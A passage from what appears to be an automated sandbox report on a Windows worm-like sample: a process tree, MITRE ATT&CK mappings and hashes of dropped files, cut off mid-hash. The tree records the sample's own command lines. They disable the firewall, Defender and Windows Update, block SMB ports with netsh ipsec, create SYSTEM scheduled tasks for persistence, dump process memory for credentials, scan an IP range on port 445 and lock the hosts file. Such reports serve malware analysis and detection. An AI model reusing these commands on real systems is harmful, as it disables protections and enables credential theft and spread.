- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2456
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "ruugiifbq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\wuzfiigi\ysugeag.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "inqtbitvs" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\elnhjuuli\tlulbk.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2224
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "inqtbitvs" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\elnhjuuli\tlulbk.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3088
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:676
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1812
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4388
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4068
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3736
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3620
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3476
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1916
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3184
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1600
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3524
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:472
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 800 C:\Windows\TEMP\ryivyizlv\800.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:624
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:4588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:2832
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4092
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5116
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:2188
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4008
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2328
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1752
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:2448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4576
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4936
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:1544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4156
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4716
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4760
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2728
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:2300
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:436
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:1892
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 372 C:\Windows\TEMP\ryivyizlv\372.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4740
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 2100 C:\Windows\TEMP\ryivyizlv\2100.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2308
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 2676 C:\Windows\TEMP\ryivyizlv\2676.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1600
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 2792 C:\Windows\TEMP\ryivyizlv\2792.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2164
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 2884 C:\Windows\TEMP\ryivyizlv\2884.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 3212 C:\Windows\TEMP\ryivyizlv\3212.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3480
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 3892 C:\Windows\TEMP\ryivyizlv\3892.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4132
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 3992 C:\Windows\TEMP\ryivyizlv\3992.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1792
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 4060 C:\Windows\TEMP\ryivyizlv\4060.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2632
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 2836 C:\Windows\TEMP\ryivyizlv\2836.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4320
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 3696 C:\Windows\TEMP\ryivyizlv\3696.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:376
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 4284 C:\Windows\TEMP\ryivyizlv\4284.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4648
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 2496 C:\Windows\TEMP\ryivyizlv\2496.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4660
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 5024 C:\Windows\TEMP\ryivyizlv\5024.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4048
- C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe
  C:\Windows\TEMP\ryivyizlv\msytnnqlg.exe -accepteula -mp 2212 C:\Windows\TEMP\ryivyizlv\2212.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2324
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\ryivyizlv\vstkqubjh\scan.bat
  2⤵
  PID:2216
- - C:\Windows\ryivyizlv\vstkqubjh\thkiiirie.exe
    thkiiirie.exe TCP 181.215.0.1 181.215.255.255 445 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1744
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3540
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4564

C:\Windows\SysWOW64\xchlyg.exe
C:\Windows\SysWOW64\xchlyg.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2732

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ysugeag.exe
1⤵
PID:3972
- C:\Windows\ime\ysugeag.exe
  C:\Windows\ime\ysugeag.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2040

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\wuzfiigi\ysugeag.exe /p everyone:F
1⤵
PID:3732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2504
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\wuzfiigi\ysugeag.exe /p everyone:F
  2⤵
  PID:2024

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\elnhjuuli\tlulbk.exe /p everyone:F
1⤵
PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3460
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\elnhjuuli\tlulbk.exe /p everyone:F
  2⤵
  PID:2216

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ysugeag.exe
1⤵
PID:1736
- C:\Windows\ime\ysugeag.exe
  C:\Windows\ime\ysugeag.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1080

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\wuzfiigi\ysugeag.exe /p everyone:F
1⤵
PID:332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:852
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\wuzfiigi\ysugeag.exe /p everyone:F
  2⤵
  PID:4000

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\elnhjuuli\tlulbk.exe /p everyone:F
1⤵
PID:5948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:6012
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\elnhjuuli\tlulbk.exe /p everyone:F
  2⤵
  PID:6056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\elnhjuuli\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\ryivyizlv\2100.dmp

Filesize
4.2MB

MD5
1d04b005980df5a8fea65193fd81c6b7

SHA1
76d3322b435d13447b975c1164760d6d727718b8

SHA256
01323d446d2b8c6521c70e06f7ee373056e129af1f90eaacec6c5242e28bf6ec

SHA512
37d3393066fc7e94db3cc233794247ead372b8604b88bf2d65871a493c8eaf80e0bb9ce55b783493e092d3c548bf6157112a3213c6cf2d59bc2b6b9ee8ea5c70

Download Submit
C:\Windows\TEMP\ryivyizlv\2496.dmp

Filesize
8.7MB

MD5
f8783a8ef7baa2d41820bc5c0c3b5ea2

SHA1
254af577bc92d16774891b2597c2f5f0aa8e7140

SHA256
0d50180fb112242ad053a70ba0abaaed87415409ca174a9191b009541dbeba2a

SHA512
a1765df7f56da67f984bb19c1023522181249b01de18aa5b232f3a8511e65ca50cbbf735b22577349d24e65a9f39404c88dd9999248e1ff01c9a1458e6683243

Download Submit
C:\Windows\TEMP\ryivyizlv\2676.dmp

Filesize
3.8MB

MD5
6e872b438343c680066a46e9083b5b91

SHA1
d2eeb7fc397149c71d55777ea4979acaf2ab0bd9

SHA256
14671b28637ebc8285999d211b80f3b9d1c4edf85b2703c14958e576f0e18906

SHA512
51b4727bf6b0738dd56c2aa61a88f10e1c219a6a1d5c2335b583e82451086bc8974c016aae1fbec2d38ffe616ee942ad5820569d141c12f688fb87d18c897bc4

Download Submit
C:\Windows\TEMP\ryivyizlv\2792.dmp

Filesize
2.9MB

MD5
11982eb625ab66de5bf426d87b92217b

SHA1
28f771fe4784742c79b1cdbbde50f2d687286f54

SHA256
63ae948a5851361e2dbd236c69c6a854a8f0d56ac6bcbe7aec1d23110376c0a2

SHA512
9ae089ce9d236d5d437147d17d76af9af6056ffe4f8bdc152466f71928bb2f1b906a37e881f29ba5507c2653da12868e55a5acba39316f2c0247e4ec318e2225

Download Submit
C:\Windows\TEMP\ryivyizlv\2836.dmp

Filesize
44.0MB

MD5
2f5d4ecf410ac5fe6f23153050d32d97

SHA1
e7565cbd07935a6a571872dafc959144ec861fb7

SHA256
62c0b78b38fbb69bef230ce3b5b627feadb72ad6bbff7b63707d70eac26b38ea

SHA512
ca6d314477b568cdf2f1face043385fde6eabc48baa2a23a66906aab5bd6e9de1db4373e9143fdad906dd70c6bdbe103a1d68c3910519fa8e208477b41f0c93d

Download Submit
C:\Windows\TEMP\ryivyizlv\2884.dmp

Filesize
7.4MB

MD5
5c7e7458ed48de9f2b6dfec19771b1f8

SHA1
9999bc589357262810755f652ca9b966df54fcfd

SHA256
5caccc71194445333b0c9365354e658fe7319b5e555317fb092457a22b637039

SHA512
c58f151873c661ac6d7c378aa9e1db97df64e449eda5f24e8926f2f8b1063c4edc3a5ae15ae3dcbd4fa33f83e509ada89828f70139aed006b9a0b44b5d1018e3

Download Submit
C:\Windows\TEMP\ryivyizlv\3212.dmp

Filesize
810KB

MD5
4f298f4a7bea7bf1c74dc8d5c22f7eb0

SHA1
35dc56ce8ebf78b66a742994e68e2e99195ef0d1

SHA256
bf279a8006a1ba0389f9a2757a56a42dc7034d7c7a9250876ca7f0cabaadc189

SHA512
579f1451116c621b4d6f5d5a2d50f9f3cf134fac0687c3079a520cbdb61bdbe0b85907c454c4a0d191a8b993115c1b2c7e73a1c645b4e9fb6a2be021e13f3539

Download Submit
C:\Windows\TEMP\ryivyizlv\3696.dmp

Filesize
1.2MB

MD5
ec26fb190a3df86e6d7f72c2b136dd45

SHA1
9dbaf85be4edb9fa435ef74d29a766d4af948c7c

SHA256
1275a2f27cbd93892047e87b1b9dcae04e8ff52d629d475e0aa9c021c016cb7e

SHA512
0c84140e0a658d8c6b3c4f4ca72383ff67215a7cc39225b82657558f0afce7ffd970625e4bc38be32895b343560644679ef5e40051db68656b16119573404ae5

Download Submit
C:\Windows\TEMP\ryivyizlv\372.dmp

Filesize
33.5MB

MD5
ae0e255a7823d50f66f64e6e67b80218

SHA1
88085e6c0d4acd9c58725a90aa56879a4c293a8e

SHA256
ca6e66a07b9352daa3ba1ee9e7138d63907048051ef286e94c9816b38791ccd3

SHA512
4f3f0d65761c1079a0fa9eff4a8dd63914f8d5aaf5a92591145ef4d1e9a3fe635bfa95a9f8ba0bc7f73945d2bdbac30401bf4767eeccc4ce59b9fd6467befc9b

Download Submit
C:\Windows\TEMP\ryivyizlv\3892.dmp

Filesize
2.5MB

MD5
ed2ec51410eb3ae872ed5f9631723788

SHA1
7532e0fca5cf9621fbb9e26d637c95246135030c

SHA256
e21889aca37a8af92031f7cf24d2f35c3a6c7ea17707d1a9bbc221069cb396d2

SHA512
c2bc8c5c0edb2ef27d68548a627dc2074ed94c49c58fb2c24fd5f4ca6e3da49c29cc92c5eb3008e41516ab948e924513c5b3d537fbfc30abb97c3bf6a8108bed

Download Submit
C:\Windows\TEMP\ryivyizlv\3992.dmp

Filesize
20.8MB

MD5
a486351dde10eaaa1d78b1d67f794ec7

SHA1
70e0ba760bee4088ea5959eb0edbcc76673100dd

SHA256
f14bc72e0a507d5825790a208f1c8b755d661798f16ee102bed923850c67dbff

SHA512
28b1e2f3466196210cf0d6a2ca2622462c824aa13477ef1663c9004045dd5984c5b0a40ad2fcd15f666567f31707499253cd0526d2cbedc0b55e2ed63e8ffe2a

Download Submit
C:\Windows\TEMP\ryivyizlv\4060.dmp

Filesize
4.3MB

MD5
74e346fde6d91a8166be41749a0f6d67

SHA1
d272f39c4a4816836009097786540c7731a45351

SHA256
46e206a688f56d570c969ce7304d86b03ba63c10941e58a4ff8618ca63d58203

SHA512
f40892e7ce4783ab78843041d69e940e9d84b09f4e075bee4f7942cc880e6e31e504910122e592eeb2a10479b82388f0800f037e913be9275c412dbbfec0cd58

Download Submit
C:\Windows\TEMP\ryivyizlv\4284.dmp

Filesize
25.7MB

MD5
73e7afa58c4cf10a3d49382ee49a0623

SHA1
26ee72004aaa15735e56087f89d1029e56dc883d

SHA256
b8020f67d5e07f17d13e262346065f8108a2da09c253b122e06e5fcda38f6e45

SHA512
f8e840797f2adaf238ab0ec9557025a1cf0f11a1a20bfb20e8de59e15466808a756da215a71326ec582d3398dc8c44749ee4d028ec69a4b509db87f34f8a1dc1

Download Submit
C:\Windows\TEMP\ryivyizlv\800.dmp

Filesize
3.4MB

MD5
326f2dc7f74bb5ca6f4ade7bf974528f

SHA1
b784405b0ec98a6b4e8b1b0e3937e31a84673ef6

SHA256
9c996e0d6673e8b3606bdde27bce089c3f0615238420789fc198e1194b6d48ee

SHA512
2a86978c803d97b34498a1713c9eff5bfc9dc01f988bedbf6eb5c1d04853ff90f96e1748cb5585ad0be7b591fa96e92d807b967406116bca50b432654478032c

Download Submit
C:\Windows\Temp\elnhjuuli\tlulbk.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\nsjDD23.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsjDD23.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\ryivyizlv\msytnnqlg.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\ryivyizlv\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\ryivyizlv\vstkqubjh\lufbpnmgs.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\ryivyizlv\vstkqubjh\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
